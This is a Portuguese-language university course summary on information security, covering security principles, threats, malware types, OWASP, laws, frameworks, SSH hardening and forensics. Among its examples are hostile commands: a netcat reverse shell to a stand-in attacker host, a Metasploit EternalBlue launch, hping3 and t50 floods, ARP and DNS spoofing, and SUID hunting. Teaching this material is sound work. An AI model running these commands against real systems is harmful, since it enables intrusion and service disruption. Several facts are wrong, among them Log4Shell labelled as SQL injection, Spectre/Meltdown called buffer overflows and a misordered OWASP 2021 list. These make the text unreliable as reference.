CÓDIGO DA DISCIPLINA: DEE345
SEGURANÇA DIGITAL - RESUMÃO
Prof. Jéfer Benedett Dörr
Departamento de Engenharias e Exatas - UFPR/Palotina
Docente de Segurança da Informação
Segurança de Sistemas Computacionais – Resumão da Disciplina
Uma Visão Abrangente dos Fundamentos Essenciais
-
Apresentação do Professor:
- Prof. Jéfer Benedett Dörr, Departamento de Engenharias e Exatas – UFPR/Palotina
- Contato: seu.email@ufpr.br | Office Hours: Seg/Qua 14h–16h (Zoom)
-
Formato da Disciplina:
- 100% online, self-paced via Moodle UFPR
- Videoaulas curtas (5 min), slides interativos, laboratórios hands-on
- Quizzes em HTML/CSS/JS para autoavaliação imediata
-
Objetivos Gerais:
- Consolidar pilares clássicos de segurança (CIA, Seis Barreiras “D”)
- Práticas avançadas: Segurança Web, Auditoria de Logs, Hardening
- Pentest & Ethical Hacking: Metodologias e Ferramentas
-
Relevância Pedagógica:
- Capacitar futuros professores para ensino de cibersegurança no ensino básico
- Projetos interativos: “Seja Incrível na Internet” (Google Interland)
- Alinhamento com iniciativas: SaferNet, InternetSegura.br
Conceitos Essenciais de Segurança
Segurança de sistemas é um conceito amplo, abrangendo comportamento humano, redes, programação, hardware e muito mais.
- Security: proteção contra ameaças intencionais, como intrusões e roubo de dados.
- Safety: prevenção de falhas acidentais que podem causar danos físicos ou lógicos.
- Reliability: garantia de operação contínua mesmo sob condições de falha parcial.
As Seis Barreiras “D” da Segurança:
Desencorajar
– políticas e banners visíveis.
Dificultar
– senhas fortes, MFA.
Discriminar
– RBAC, ACLs.
Detectar
– IDS/IPS e monitoramento de logs.
Deter
– bloqueio automático após falhas.
Diagnosticar
– análise forense de evidências.
Pilares da Segurança da Informação
- Confidencialidade: impedir acesso não autorizado (ex: AES em cartões)
- Integridade: garantir dados não alterados sem permissão (hashes)
- Disponibilidade: acesso aos serviços quando necessários (DRP, failover)
- Autenticação: confirmar identidade (senha, token, biometria)
- Autorização: validar permissões após autenticação
- Não Repúdio: impedir negação de ação (assinaturas digitais)
Pilares Adicionais & Princípios de Segurança
-
Análise & Gestão de Riscos:
- Identificar, avaliar e priorizar riscos a Confidencialidade, Integridade e Disponibilidade
- Metodologias: ISO 31000, OCTAVE, FAIR
- Exemplo: calcular risco = probabilidade × impacto para cenários de vazamento
-
Classificação da Informação:
Pública
– sem restrições
Uso Interno
– acesso limitado a funcionários
Restrita
– departamentos específicos (ex.: RH)
Confidencial
– dados sensíveis (ex.: CPFs, segredos comerciais)
-
Controle de Acesso:
- ACL (Linux):
setfacl -m u:alice:rw /dados/relatorio.txt
- RBAC (Windows/AD): uso de Grupos de Segurança e Políticas de Acesso
- MAC vs. DAC: SELinux/AppArmor vs. permissões Unix padrão
-
Criptografia:
- Simétrica: AES-256
openssl enc -aes-256-cbc -in dados.txt -out dados.enc
- Assimétrica: RSA-4096
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:4096 -out key.pem
- Certificados X.509: TLS/SSL
openssl req -x509 -newkey rsa:2048 -days 365 -keyout key.pem -out cert.pem
-
Princípios de Segurança:
- Privilégio Mínimo: conceder somente as permissões necessárias
- Separação de Privilégios: dividir tarefas entre contas distintas
- Projeto Aberto: algoritmo público; segredo na chave
- Eficiência: minimizar overhead de performance
- Elo Mais Fraco: reforçar treinamento e awareness do usuário
Ameaças & Vulnerabilidades Fundamentais
Ameaça: qualquer evento ou ação que possa comprometer Confidencialidade, Integridade ou Disponibilidade de um sistema.
- Ator de Ameaça: interno (usuário malicioso) ou externo (cibercriminoso, APT).
- Tipo de Ameaça:
- Passiva: sniffing (Wireshark), coleta de dados sem alterar o tráfego.
- Ativa: corrupção de dados, DoS (hping3 --flood), MITM (bettercap ARP spoofing).
- Exemplo Real: ataque de sniffing em rede pública capturando credenciais FTP.
Vulnerabilidade: falha ou fraqueza no sistema que permite a exploração de ameaças.
- Software:
- Injeção de SQL (CVE-2021-44228 – Log4J)
- Buffer Overflow (Spectre/Meltdown em CPUs)
- Configuração:
- Senhas fracas (“123456”) armazenadas em /etc/shadow sem salt
- Portas SSH expostas sem fail2ban ou TMOUT
- Hardware/Canal Lateral:
- Espectro de energia (ChipWhisperer – análise de consumo)
- Temporização (RSA timing attacks)
- Exemplo Real: exploração de CVE-2021-45046 em ambiente corporativo para execução remota de código.
Mitigações & Boas Práticas
- Gestão de Patches:
sudo apt update && sudo apt upgrade
- Hardening:
ufw default deny incoming; ufw allow 5849/tcp; ufw enable
- Defesa em Camadas: Firewall, IDS/IPS (Snort), WAF, antivírus, EDR
- Teste Contínuo: varreduras regulares (Nessus, OpenVAS), pentests agendados
- Monitoramento: Logs centralizados (ELK), alertas em tempo real
Tipos de Ataques Cibernéticos
-
Passivo vs. Ativo
Passivo: observação e captura de dados sem alterar o tráfego
tcpdump -i eth0 -w captura.pcap
Ativo: intervenção no tráfego para modificar ou interromper
hping3 -S alvo.com -p 80 --flood
-
Local vs. Remoto
Local: exige credenciais ou acesso físico ao sistema
sudo find / -perm -4000
Remoto: realizado pela rede sem conta local
nmap -sV -Pn alvo.com
-
Classificação STALLINGS
• Interrupção: DoS/DDoS para negar serviço (Ping da Morte)
ping -s 65507 alvo.com
• Interceptação: sniffing e MITM (Bettercap ARP spoof)
sudo bettercap -X --proxy-module arp.spoof
• Modificação: alteração de dados em trânsito (TCP RST injection)
• Fabricação: injeção de pacotes/recursos falsos (spoofing DNS)
sudo dnsspoof -i eth0 -f hosts.txt
-
Elevação de Privilégios
• Vertical: ganhar privilégios de administrador via SUID binaries
find / -perm -u=s -type f 2>/dev/null
• Horizontal: assumir identidade de outro usuário
su - outro_usuario
Malware em Foco
-
Vírus: código que se anexa a executáveis e propaga-se quando executados.
Ex: arquivo infectado que multiplica-se em pendrives.
strings infectado.exe | grep "MZ"
-
Worm: autorreplicante e espalha-se via rede sem intervenção humana.
Ex: Conficker explorando falha no Windows
nmap -p445 --script smb-vuln-cve-2008-4250 192.168.1.0/24
-
Trojan: software legítimo com funcionalidade maliciosa oculta.
Ex: falso instalador de Flash que instala keylogger.
-
Exploit: código que explora vulnerabilidade específica.
Ex: EternalBlue (CVE-2017-0144) em WannaCry.
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 10.0.0.5; run"
-
Sniffer: captura pacotes de rede para análise de tráfego.
tshark -i eth0 -w captura.pcap
-
Keylogger: registra teclas digitadas para roubo de credenciais.
Ex: implantado por Phishing.
-
Rootkit: oculta presença de malware no sistema.
rkhunter --check --enable all
-
Backdoor: acesso remoto persistente instalado sem autorização.
Ex: Netcat reverse shell
nc -e /bin/bash atacante.com 4444
-
Ransomware: cifra arquivos e exige resgate para liberação.
Ex: Cryptolocker.
-
Botnet: rede de máquinas zumbis controladas remotamente.
Ex: Mirai para DDoS em IoT.
-
Spyware: coleta dados do usuário sem seu conhecimento.
Ex: monitoramento de webcam e cliques.
Case: EternalBlue & WannaCry
Em maio/2017, o exploit EternalBlue aproveitou CVE-2017-0144 para propagar o ransomware WannaCry, afetando milhares de sistemas Windows em minutos.
# Patch de mitigação (desativar SMBv1)
Set-SmbServerConfiguration –EnableSMB1Protocol $false
Ataques Comuns & OWASP Top 10
Engenharia Social & Phishing
-
Engenharia Social: manipulação psicológica para extrair informações.
Exemplo: uso do Social-Engineer Toolkit (SET):
setoolkit
-
Phishing: envio de e-mails falsos com links maliciosos.
Detecção rápida:
curl -I https://exemplo.falso.com/login
-
419 Scam: fraude de antecipação de pagamento (Advance Fee).
Payload típico:
Subject: URGENTÍSSIMO & CONFIDENCIAL
From: BancoCentral@ng.gov.ng
Body: “You have been chosen to transfer $10M; send $1,000 for fees.”
-
Hoax: boatos e correntes que induzem ao repasse.
Contramedida: verificar sempre em sites oficiais de checagem de boatos.
DoS / DDoS
OWASP Top 10 – 2021
- A01-Injeção: SQLi, LDAPi, NoSQLi
- A02-Quebra Criptográfica: uso de alg. fracos
- A03-Controle de Acesso Quebrado: acesso não autorizado
- A04-Design Inseguro: falta de neutralidade e fábricas de objetos
- A05-Configuração Insegura: defaults não seguros
- A06-Componentes Vulneráveis: libs desatualizadas
- A07-Ident. e Auth Falhas: credenciais fracas
- A08-Software e Dados de Integridade Inválidos: falta de verificação de integridade
- A09-Log e Monitoramento Insuficientes: detecta tarde intrusões
- A10-Server-Side Request Forgery (SSRF): servidor faz requisições arbitrárias
Zero-Day Exploits
Vulnerabilidades sem correção: alta criticidade e uso em ataques furtivos.
Exemplo: Log4Shell (CVE-2021-44228):
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true
Leis de Segurança Digital
Marco Civil da Internet (12.965/2014):
- Neutralidade de rede e privacidade dos usuários.
- Retenção de registros:
- Logs de conexão (IP, data/hora): 1 ano
- Logs de aplicação (acesso a conteúdo): 6 meses
- Acesso judicial apenas mediante ordem.
Normas & Frameworks de Segurança
-
PCI-DSS (Cartões de Crédito)
- 12 requisitos: redes seguras, proteção de dados, gestão de vulnerabilidades.
- Exemplo: usar
nmap --script ssl-enum-ciphers
para verificar ciphers permitidos.
-
ITIL (Gestão de Serviços TI)
- 5 fases do ciclo de vida: Estratégia, Desenho, Transição, Operação e Melhoria Contínua.
- Processo de Gerenciamento de Incidentes: identificação, classificação, resolução.
-
COBIT (Governança de TI)
- 5 domínios: Avaliar, Dirigir, Monitorar; Entregar, Servir e Suportar; Obter, Construir e Implementar; Monitorar, Avaliar e Medir; Planejar e Organizar.
- Objetivos de controle alinhados a metas de negócio.
-
NIST 800-series
SP 800-53
: controles de segurança para sistemas federais dos EUA.
SP 800-86
: guia de técnicas forenses e resposta a incidentes.
-
ISO 27001 & 27002
- ISO 27001: SGSI com PDCA (Plan, Do, Check, Act).
- ISO 27002: 14 domínios de controle (política, RH, ativos, acesso, criptografia).
-
MITRE ATT&CK
- Base de conhecimento de táticas (Reconhecimento, Execução, Persistência…) e técnicas (T1566 Phishing, T1598 Spearphishing Attachment).
- Uso em Threat Hunting e mapeamento de lacunas defensivas.
-
CIS Controls
- 20 controles críticos priorizados (ex.: Inventário de Hardware, Gestão de Vulnerabilidades, Proteção de Logs).
- Exemplo de verificação:
ansible-playbook cis_centos7.yml
.
-
NIST CSF (Cybersecurity Framework)
- 5 funções: Identify, Protect, Detect, Respond, Recover.
- Uso: autoavaliação de maturidade e ciclo de melhoria contínua.
Gestão de Riscos & Continuidade de Negócios
-
Análise de Riscos:
- Metodologias: ISO 31000 (contexto, identificação, avaliação, tratamento), FAIR (quantitativa).
- Cálculo simples de risco:
Risco = Probabilidade × Impacto
(ex.: 0.2 × R$100k = R$20k).
- Ferramentas:
python -m pip install openfair
para modelar cenários de risco.
-
Plano de Continuidade de Negócio (PCN):
-
CSIRT (Respostas a Incidentes):
- cert.br: reportar incidentes em
incident@cert.br
e acompanhar boletins diários.
- RNP-CAIS: compartilhar indicadores de ameaça via cais.rnp.br.
- Fluxo: Detecção → Análise Inicial → Contenção → Erradicação → Recuperação → Lições Aprendidas.
-
Conscientização & Cultura Digital:
Autenticação, Autorização & Hardening
-
Fatores de Autenticação (SYK, SYH, SYA) & MFA
- SYK (Something You Know): senha, PIN, padrão de desenho
- SYH (Something You Have): token TOTP, smartcard, YubiKey
- SYA (Something You Are): biometria (impressão digital, facial)
- Exemplo TOTP com Google Authenticator:
# Instalação (Debian/Ubuntu)
sudo apt install libpam-google-authenticator
# Configuração do usuário
google-authenticator
# Em /etc/pam.d/sshd, adicione:
auth required pam_google_authenticator.so
# Em /etc/ssh/sshd_config:
ChallengeResponseAuthentication yes
AuthenticationMethods publickey,keyboard-interactive
-
SSO & Tokens
-
Controle de Acesso
- ACL em Linux:
setfacl -m u:alice:rw /dados/secretos.txt
getfacl /dados/secretos.txt
- RBAC com sudoers:
# /etc/sudoers.d/dbadmins
%dbadmins ALL=(ALL) /usr/bin/mysql, /usr/bin/psql
- Permissões UNIX: user/group/others (rwx → 755, 644)
-
Hardening SSH & Sessões
- Alterar porta em
/etc/ssh/sshd_config
:
Port 5849
PermitRootLogin no
PasswordAuthentication no
ClientAliveInterval 300
ClientAliveCountMax 2
- Logout automático (TMOUT):
# em /etc/profile
TMOUT=180
readonly TMOUT
export TMOUT
- Block brute-force com Fail2Ban:
# /etc/fail2ban/jail.local
[sshd]
enabled = true
port = 5849
filter = sshd
logpath = /var/log/auth.log
maxretry = 5
bantime = 3600
- Port Knocking:
# /etc/knockd.conf
[openSSH]
sequence = 7000,8000,9000
command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
-
Ferramentas Essenciais
Nmap
– descoberta de portas e serviços (nmap -sC -sV alvo
)
Wireshark
– análise profunda de pacotes
Metasploit
– framework de exploração (msfconsole
)
Burp Suite
– proxy e scanner para aplicações web
John the Ripper
– quebra de hashes de senhas
SELinux
/ AppArmor
– confinamento e políticas de segurança
Segurança de Redes & Aplicações
-
Firewalls:
-
IDS/IPS:
-
Honeypots:
-
VPN:
-
Proxies & DNS/E-mail Security:
-
SIEM & SOAR:
- ELK Stack: Filebeat → Elasticsearch → Kibana dashboards.
- Splunk: Universal Forwarder para ingestão de logs, pesquisas e alertas.
- Cortex XSOAR: playbooks YAML para automação de resposta (isolamento de host, bloqueio de IP).
Criação de Software Seguro & Computação Forense
-
DevSecOps & SDL:
-
Engenharia Reversa:
- strings: extrai texto de binários
strings -n 6 binary.exe
- objdump: desassembla para revisão de assembly
objdump -d binary.exe | less
- GDB: depuração passo-a-passo
gdb binary
(gdb) break main
(gdb) run
- Ghidra headless: análise automatizada
analyzeHeadless ghidra_proj -import binary.exe -postscript analyze.py
-
SandBox:
-
Recuperação de Dados:
-
Computação Forense:
- Imagem de disco:
dd if=/dev/sda of=~/forense/image.dd bs=4M conv=sync,noerror
sha256sum ~/forense/image.dd
- Autopsy: análise forense via navegador
autopsy
- FTK Imager: GUI para geração de imagens e hashes.
- Volatility: análise de memória RAM
volatility -f memory.dmp --profile=Win7SP1x64 pslist
- Wireshark: inspeção de tráfego de rede
wireshark capture.pcap
-
Guias de Referência:
Novas Ameaças & Recursos
-
APTs (Advanced Persistent Threats):
- Exemplo: APT29 (Cozy Bear) — espionagem a vacinas brasileiras em 2022
- Detecção com MITRE ATT&CK Tactics (Persistence, Credential Access)
tactic: TA0003; technique: T1548
-
Zero-Day Exploits:
- Ex.: PrintNightmare (CVE-2021-34527) permitia execução remota no Windows
- Mitigação temporária: desabilitar spooler
sc config spooler start= disabled
-
DeepFakes:
- Vídeos e áudios manipulados com IA — riscos à reputação e fraude
- Ferramenta de detecção: Deepware Scanner
deepware scan video.mp4
-
MITM (Man-in-the-Middle):
-
Buffer Overflow:
-
DDoS Avançado:
- T50 multi-vetor:
t50 --udp --flood -d 1470 alvo.com
- SYN Flood com hping3:
hping3 -S alvo.com -p 80 --flood
- Mitigação: rate limiting em iptables
iptables -A INPUT -p tcp --syn -m limit --limit 10/s -j ACCEPT
-
DNS Poisoning:
-
Security Distros:
- Kali Linux: +600 ferramentas de pentest, suporte ARM, WSL
- ParrotSec: privacidade, anonimização e dev tools integrados
-
CTFs & Prática:
-
Certificações:
- CEH – Certified Ethical Hacker
- OSCP – Offensive Security Certified Professional
- CISSP – Certified Information Systems Security Professional
- CISM – Certified Information Security Manager
-
Livros & Blogs:
- “Google Hacking for Penetration Testers” – Johnny Long
- “Practical Malware Analysis” – Sikorski & Honig
- Blogs: Krebs on Security, Dark Reading, Threatpost
Novas Ameaças, Recursos & Legislação
- APTs, Zero-Day, DeepFakes, MITM, Buffer Overflow
- DDoS Avançado: T50, hping3; DNS Poisoning
- Distros de Segurança: Kali Linux, ParrotSec
- CTFs & Prática: TryHackMe, HackTheBox, VulnHub
- Certificações: CEH, OSCP, CISSP, CISM
- Livros & Blogs: “Google Hacking for Penetration Testers”, Krebs on Security, Dark Reading
-
Leis & Regulamentações:
- Lei Carolina Dieckmann (12.737/2012): invasão de dispositivo alheio para obter, adulterar ou destruir dados sem autorização.
- Data Protection Act 2018 (DPA 2018): arcabouço legal de proteção de dados pessoais no Reino Unido.
- Sarbanes-Oxley (SOx): lei americana (2002) para proteção contra fraudes financeiras.
- Política Nacional de SI (Decreto 9.637/2018): governança da segurança da informação no Brasil.
- LGPD (13.709/2018): Lei Geral de Proteção de Dados Pessoais no Brasil.
- Marco Civil da Internet (12.965/2014): neutralidade, direitos e deveres, retenção de logs (1 ano conexão, 6 meses aplicação).
- Lei de Crimes Cibernéticos (14.155/2021): tipifica novas modalidades de crime digital.
- Medida Provisória 2.200-02 (24/08/2001): regulamenta assinaturas digitais e contratos eletrônicos no Brasil.
Quiz de Avaliação – Resumão